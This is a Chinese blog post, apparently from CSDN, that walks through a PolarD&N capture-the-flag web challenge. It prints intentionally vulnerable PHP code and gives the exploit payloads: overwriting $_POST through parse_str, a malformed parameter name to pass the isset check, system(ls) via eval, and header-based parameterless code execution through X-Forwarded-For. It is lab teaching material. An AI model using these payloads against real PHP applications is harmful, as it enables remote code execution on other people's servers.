PHP是世界上最好的语言-PolarD&N XXF无参数RCE QUERY_STRING 特性

最新推荐文章于 2024-05-23 21:27:58 发布
最新推荐文章于 2024-05-23 21:27:58 发布
阅读量456 收藏 10
点赞数 7
分类专栏: PolarD&N 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/135041787
版权

这个靶场我之前看到过打广告,而且感觉比较新 来坐坐

 <?php
//flag in $flag
highlight_file(__FILE__);
include("flag.php");
$c=$_POST['sys'];
$key1 = 0;
$key2 = 0;
if(isset($_GET['flag1']) || isset($_GET['flag2']) || isset($_POST['flag1']) || isset($_POST['flag2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($flag1 == '8gen1' && $flag2 == '8gen1') {
    if(isset($_POST['504_SYS.COM'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\?/", $c)){
         eval("$c");  

    }
}
}
?>

这里还是

@parse_str($_SERVER['QUERY_STRING']);

这里存在特性

?_POST[flag]=11111

通过extract($_POST);


会变为


$flag = 11111

所以第一个flag我们直接绕过了

GET 传递?_POST[flag1]=8gen1&_POST[flag2]=8gen1

然后需要绕过

    if(isset($_POST['504_SYS.COM'])){

通过 _ 就可以思考到非法参数了

504[SYS.COM=1

然后我们就可以执行命令了

sys=system(ls);

payload

?_POST[flag1]=8gen1&_POST[flag2]=8gen1


504[SYS.COM=1&sys=system(ls);

但是我们无法直接获取到flag 所以需要无参数rce 因为过滤了 引号

无参数RCE绕过的详细总结(六种方法)_ctf rce绕过-CSDN博客

这里的方法都可以使用

这里使用一个XXF执行命令的

首先我们逆向打印请求头

504[SYS.COM=1&sys=print_r(array_reverse(getallheaders()));

 然后我们通过 pos 和eval 执行命令

pos 会输出当前数组的值 第一个是 xxf 就是ip 然后执行命令 我们将命令拼接即可

这里还需要XXF后面的内容注释掉 不然无法执行

双层小牛堡
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
polarctf靶场【web】PHP世界上最好的语言、反序列化、BlackMagic、再来ping一波啊、找找shell
m0_73981089的博客
04-24 868
polarctf
polar靶场通关笔记
weixin_43296565的博客
06-06 4512
这里是关于自己打polar靶场的小笔记
polar CTF 简单rce
samRsa
01-03 564
polar CTF 简单rce 【代码】polar CTF 简单rce
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2066
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1433
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
Polar_D&N[MISC]大礼包
m0_73720466的博客
10-15 74
因为flag格式是flag{},想到栅栏密码对其进行解密(https://www.qqxiuzi.cn/bianma/zhalanmima.php)1) 根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”在图片尾部得到一串base32,解码得到base64,再解码后得到明文sn{bvr1_0yytcyp_fp0}得到synt{cbyvpr_1f_p00y},再解一次凯撒密码(移位数是13)得到flag。
PolarD&N靶场题解
qq_43423311的博客
03-23 2406
PolarD&N CTF靶场。
[PolarD&N]题解——03ret2syscall_32
2301_80238613的博客
10-13 140
决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。存在ebx,ecx,edx连续的寄存器,选取连续的即可。题目名称:03ret2syscall_32。题目来源:PolarD&N靶场(是一个32位静态的题目!如有错误欢迎大佬指正!
PolarD&N_PWN_Choice
Kuluha的博客
10-14 164
当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需。在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7606
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1323
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
PolarD&N(简单rce
果粒程
04-16 440
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
Ubuntu卸载软件
weixin_43794095的博客
05-23 42
在删除这些目录之前,你必须确定一个非常重要的事情:确认没有任何服务正在使用这些版本的 PHP。如果你删除了正在使用的 PHP 版本的扩展目录,那么依赖于这个版本的 PHP 的网站或服务可能会停止工作。确定了不再需要的 PHP 版本后,你可以卸载它。这将卸载所有 PHP 7.4 相关的包,包括扩展。首先,你可以查看系统中安装了哪些 PHP 版本。卸载特定版本的 PHP
PHP反射API与接口的动态分析
APItesterCris的博客
05-22 199
PHP的反射(Reflection)API 提供了一种在运行时获取类和对象信息的能力,包括类的方法、属性、接口等。这对于动态分析、构建IDE的自动完成功能、或者进行复杂的元编程非常有用。以下是如何使用PHP反射API进行动态分析的示例代码。
wordpress主题 ACG美化插件v3.4.2支持zibll主题7b2主题美化
12年全栈程序开发
05-23 58
大部分代码均为CSS、JS做成插件只是为了方便懒人小白站长。独具一格的二次元风格,打造全新的子比美化方向。后台全功能一览,大部分美化均为网上通用流传,
firewalld
FolloW_0616的博客
05-23 420
区域如同进入主机的安全门,每个区域都具有不用限制程度的规则可以使用一个或多个区域,但是任何一个活跃区域至少需要关联源地址或接口默认情况下,public区域是默认区域,包含所有接口(网卡)trusted(信任区域)允许所有的传入流量public(公共区域)允许与ssh或dhcpv6-client预定义服务匹配的传入流量,其余均拒绝。是新添加网络接口的默认区域external(外部区域)允许与 ssh 预定义服务匹配的传入流量,其余均拒绝。
nssctf(Web刷题)
最新发布
2302_80935968的博客
05-23 396
字符串和数字比较使用==时,字符串会先转换为数字类型再比较,若字符串以数字开头,则取开头数字作为转换结果,不能转换为数字的字符串(例如"aaa"是不能转换为数字的字符串,而"123"或"123aa"就是可以转换为数字的字符串)或null,则转换为0。在上面的示例中,name、age、isStudent、address、phoneNumber都是键,对应的值分别是字符串、数字、布尔值、嵌套的JSON对象、null。在php中,0e开头的数字会当作科学计数法解析,不管后面的值为任何东西,0的任何次幂都为0。
jenkins插件之xunit
made4971的博客
05-17 332
填写一下命令,这个命令是docker中执行phpunit单元测试,请根据你的实际情况调整php执行文件路径。一章中phpunit.xml中配置的junit生成结果的地址需要保持一致。在测试报告列填写reports/junit.xml , 注意此处地址和。您的项目 - 配置 - Build Steps, 新增。您的项目 - 配置 - 构建后操作, 新增。Build Step选择 执行SHELL。超时时间根据实际情况配置。搜索xunit并安装。
春秋云境CVE-2023-50564
2303_76653367的博客
05-17 492
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
SSRF攻击技术
XLbb的博客
05-19 1143
CSRF 是跨站请求伪造攻击,XSS 是实现 CSRF 的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。简要介绍:gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用中gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样变可以解决漏洞点不在GET参数的问题了。XXE 是 XML 外部实体注入攻击,XML 中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值